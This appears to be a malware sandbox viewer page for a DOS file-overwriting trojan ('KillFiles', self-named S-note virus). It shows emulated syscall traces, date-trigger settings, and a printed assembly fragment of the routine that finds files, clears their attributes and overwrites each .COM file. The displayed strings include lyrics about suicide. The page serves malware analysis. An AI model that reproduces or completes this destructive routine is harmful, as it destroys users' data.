Sample viewer

vx.netlux.org/Trojan.DOS.KillFiles.z

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:29:13.346473435Z 59 PC: 12a48 | Change current directory
2018-12-17T22:29:13.355584149Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-17T22:29:13.364175078Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-17T22:29:13.36694048Z 78 PC: 12a62 | Find first file
2018-12-17T22:29:13.373949691Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.380850669Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.397988654Z 61 PC: 12a82 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:29:13.40603063Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:29:13.414010371Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.423592893Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.42689701Z 61 PC: 12a62 | Open file (Filename = 'PRINT.S')
2018-12-17T22:29:13.435244979Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.44198321Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.453150244Z 61 PC: 12a82 | Open file (Filename = 'PRINT.S')
2018-12-17T22:29:13.467604449Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 6)
2018-12-17T22:29:13.474951774Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.483733991Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.487055552Z 61 PC: 12a62 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:29:13.494559137Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.50091546Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.511316395Z 61 PC: 12a82 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:29:13.525159426Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 7)
2018-12-17T22:29:13.532894312Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.54202633Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.546400171Z 61 PC: 12a62 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:29:13.554033648Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.560656137Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.572308384Z 61 PC: 12a82 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:29:13.585851145Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 8)
2018-12-17T22:29:13.594394142Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.604358288Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.607875692Z 61 PC: 12a62 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:29:13.615753626Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.62345131Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.634620528Z 61 PC: 12a82 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:29:13.647823331Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 9)
2018-12-17T22:29:13.656875451Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.666352147Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.669676005Z 61 PC: 12a62 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:29:13.678033295Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.684820113Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.696137537Z 61 PC: 12a82 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:29:13.709621898Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 10)
2018-12-17T22:29:13.718666482Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.727459295Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.730785177Z 61 PC: 12a62 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:29:13.739264832Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.745699704Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.756799649Z 61 PC: 12a82 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:29:13.770904353Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 11)
2018-12-17T22:29:13.779629833Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.788545026Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.792684986Z 61 PC: 12a62 | Open file (Filename = 'PAH.COM')
2018-12-17T22:29:13.800567159Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.807255947Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.818873022Z 61 PC: 12a82 | Open file (Filename = 'PAH.COM')
2018-12-17T22:29:13.83236162Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 12)
2018-12-17T22:29:13.840333403Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.848997416Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.852884412Z 61 PC: 12a62 | Open file (Filename = 'TEST.COM')
2018-12-17T22:29:13.862772754Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.869066001Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.88574073Z 61 PC: 12a82 | Open file (Filename = 'TEST.COM')
2018-12-17T22:29:13.923367461Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 13)
2018-12-17T22:29:13.931240521Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.94120817Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.944672915Z 25 PC: 12ab2 | Get default drive
2018-12-17T22:29:13.949322314Z 9 PC: 12ac8 | Display string (String= ' A tous mes potes,je vis grace a eux. -18 nov. 2001-vitrolles, France')
2018-12-17T22:29:13.954458082Z 9 PC: 12acf | Display string (String= ' S-note virus by 2STONED (vince), greets 2 Elodie,u r so cool..')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5218,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:00.164271501Z 59 PC: 12a48 | Change current directory
2018-12-25T11:54:00.168794366Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-25T11:54:00.175621526Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-25T11:54:00.178146051Z 78 PC: 12a62 | Find first file
2018-12-25T11:54:00.186439143Z 67 PC: 12a6d | Get or set file attributes
2018-12-25T11:54:00.197490002Z 67 PC: 12a79 | Get or set file attributes
2018-12-25T11:54:00.201945369Z 61 PC: 12a82 | Open file (Filename = 'As')
2018-12-25T11:54:00.207769829Z 64 PC: 12a8f | Write file or device (Write 1902 bytes on handle 2)
2018-12-25T11:54:00.22983354Z 62 PC: 12a94 | Close file
2018-12-25T11:54:00.231486416Z 79 PC: 12a99 | Find next file
2018-12-25T11:54:00.233759946Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.241276932Z 67 PC: 12a6d | Get or set file attributes (See above)
2018-12-25T11:54:00.246752409Z 67 PC: 12a79 | Get or set file attributes (See above)
2018-12-25T11:54:00.714528495Z 61 PC: 12a82 | Open file (See above)
2018-12-25T11:54:00.72686415Z 64 PC: 12a8f | Write file or device (See above)
2018-12-25T11:54:00.733469896Z 62 PC: 12a94 | Close file (See above)
2018-12-25T11:54:00.742401936Z 79 PC: 12a99 | Find next file (See above)
2018-12-25T11:54:00.746208437Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.752754738Z 67 PC: 12a6d | Get or set file attributes (See above)
2018-12-25T11:54:00.764271088Z 67 PC: 12a79 | Get or set file attributes (See above)
2018-12-25T11:54:00.776797951Z 61 PC: 12a82 | Open file (See above)
2018-12-25T11:54:00.784850854Z 64 PC: 12a8f | Write file or device (See above)
2018-12-25T11:54:00.81081845Z 62 PC: 12a94 | Close file (See above)
2018-12-25T11:54:00.820080811Z 79 PC: 12a99 | Find next file (See above)
2018-12-25T11:54:00.846852204Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.853403468Z 25 PC: 12ab2 | Get default drive
2018-12-25T11:54:00.862400795Z 9 PC: 12ac8 | Display string (String= ' A tous mes potes,je vis grace a eux. -18 nov. 2001-vitrolles, France')
2018-12-25T11:54:00.86834789Z 9 PC: 12acf | Display string (String= ' S-note virus by 2STONED (vince), greets 2 Elodie,u r so cool..')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5218,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:00.226513285Z 59 PC: 12a48 | Change current directory
2018-12-25T11:54:00.230770942Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-25T11:54:00.237428426Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-25T11:54:00.239316512Z 9 PC: 12aab | Display string (String= ' c bon pour cette fois ci ...')